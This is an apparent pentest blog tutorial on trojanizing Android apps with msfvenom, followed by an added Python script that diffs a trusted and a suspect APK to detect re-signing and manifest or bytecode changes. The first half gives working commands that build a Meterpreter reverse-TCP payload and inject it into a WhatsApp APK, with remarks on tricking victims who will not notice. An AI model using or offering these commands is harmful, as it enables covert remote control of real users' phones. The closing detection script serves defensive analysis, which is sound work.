Injecting Metasploit Payloads into Android Applications - AUTOMATICALLY
The majority of Android applications lack sufficient protections around the binary, and therefore an attacker can easily trojanize a legitimate application with a malicious payload. This is one of the reasons that mobile malware spreads so rapidly on Android phones.
In mobile security assessments, attempts to trojanize the application under scope can be useful as a proof of concept to demonstrate to the customer the business impact, in terms of reputation, if their application can be used for malicious purposes.
Payload Generation:
First of all, let's see how we can generate a payload (only the payload) using msfvenom. I assume that you already know about Metasploit, msfconsole, msfpayload and msfvenom (if not, it doesn't matter; you will learn after this post).
OK! So, let's try to generate a 'pure' malware using msfvenom.
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.76 LPORT=4444 R > pentestlab.apk
Injecting Payloads into an APK
Now, msfvenom has a function that can be used to inject our payload into a template/legitimate application.
For that we need to pass another parameter, "-x". In msfvenom the -x parameter is used to define the template file (apk/exe).
So let's try to build our payload with a legitimate application. Now the question is: why on earth do we need this?
The answer is: a pure malware apk does not run anything by default. If you click on the icon it will flash the screen and launch the malware code, so the attacker's backdoor will run on that device in order to establish the remote connection.
But in this scenario the victim has a legitimate application that works normally, so it is easy to trick anyone into using the infected app; they will never be able to tell whether anything is going wrong with their phone or not. For lazy persons like me, you can use the GUI interface that I already posted here.
OK! Back to our business:
root@kali:~# msfvenom -x whatsapp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.76 LPORT=4444 -o Whatsapp_backdoored.apk
msfvenom will decompile the application and try to discover the hook point where the payload will be injected. Furthermore, it will poison the AndroidManifest file of the application with additional permissions that could be used for post-exploitation activities. The output can be seen below:
Now, when you install this application, it installs WhatsApp only; if you already have the app installed, it will replace the old one. Sounds crazy, right? Yeah, it is crazy.
Once the payload/application is installed on your target's phone, just launch the multi handler to get the reverse connection and enjoy the show.
Not happy with this? OK, read the full article from here.
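From the defender's side, the procedure above leaves fingerprints in the rebuilt package: the manifest is rewritten, bytecode is added or changed, and, because the rebuilt APK is signed with the attacker's key rather than the publisher's, the signature block under META-INF/ no longer matches the original. The following script is an added example (not part of the original post and not Metasploit code) that compares a trusted copy of an APK against a suspect copy and reports added, removed and modified entries, with special attention to the manifest, the dex files and the signing block. Both APKs are constructed in memory as tiny zip files so the example runs offline; a real comparison would pass the bytes of two actual APK files to `compare_apks`. Note that a recompiled APK can legitimately differ in many resource files, so the strongest signal is the changed signing block, not the mere presence of differences.

```python
import hashlib
import io
import zipfile


def build_apk(entries):
    """Build an in-memory zip (an APK is a zip) from a name -> bytes mapping.
    Used only to construct sample input for this example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample: a copy obtained from a trusted source.
TRUSTED_APK = build_apk({
    "AndroidManifest.xml": b'<manifest><uses-permission android:name="android.permission.INTERNET"/></manifest>',
    "classes.dex": b"dex\n035\x00original-bytecode",
    "res/layout/main.xml": b"<LinearLayout/>",
    "META-INF/MANIFEST.MF": b"mf-publisher",
    "META-INF/CERT.SF": b"sf-publisher",
    "META-INF/CERT.RSA": b"pkcs7-signature-of-publisher",
})

# Constructed sample: a suspect copy with a rewritten manifest, changed
# bytecode, an extra asset and a signature block from a different key.
SUSPECT_APK = build_apk({
    "AndroidManifest.xml": b'<manifest><uses-permission android:name="android.permission.INTERNET"/>'
                           b'<uses-permission android:name="android.permission.RECORD_AUDIO"/></manifest>',
    "classes.dex": b"dex\n035\x00modified-bytecode",
    "res/layout/main.xml": b"<LinearLayout/>",
    "assets/extra.bin": b"added-content",
    "META-INF/MANIFEST.MF": b"mf-someone-else",
    "META-INF/CERT.SF": b"sf-someone-else",
    "META-INF/CERT.RSA": b"pkcs7-signature-of-someone-else",
})

SIGNATURE_SUFFIXES = (".RSA", ".DSA", ".EC")


def digest_entries(apk_bytes):
    """Return {entry name: sha256 hex} for every file inside the APK."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {
            info.filename: hashlib.sha256(zf.read(info)).hexdigest()
            for info in zf.infolist()
            if not info.is_dir()
        }


def compare_apks(trusted_bytes, suspect_bytes):
    """Diff two APKs entry by entry and flag a changed signing block."""
    trusted = digest_entries(trusted_bytes)
    suspect = digest_entries(suspect_bytes)
    added = sorted(set(suspect) - set(trusted))
    removed = sorted(set(trusted) - set(suspect))
    modified = sorted(n for n in trusted.keys() & suspect.keys() if trusted[n] != suspect[n])
    resigned = any(
        n.startswith("META-INF/") and n.upper().endswith(SIGNATURE_SUFFIXES)
        for n in added + removed + modified
    )
    return {"added": added, "removed": removed, "modified": modified, "resigned": resigned}


def assess(report):
    """Turn the raw diff into the findings an analyst cares about."""
    findings = []
    if "AndroidManifest.xml" in report["modified"]:
        findings.append("manifest changed: inspect for added permissions")
    if any(n.endswith(".dex") for n in report["modified"] + report["added"]):
        findings.append("bytecode changed or added")
    if report["resigned"]:
        findings.append("signing block differs: package was re-signed with another key")
    return findings


if __name__ == "__main__":
    report = compare_apks(TRUSTED_APK, SUSPECT_APK)
    for key in ("added", "removed", "modified"):
        print(f"{key}: {report[key]}")
    for finding in assess(report):
        print("FINDING:", finding)
```

In practice the trusted copy would come from the official store or the vendor's own distribution channel, and the suspect copy from the device under investigation; `compare_apks` only needs the raw bytes of each file. The script does not parse the binary manifest format, so "manifest changed" is a prompt to decode and review it with the usual Android tooling.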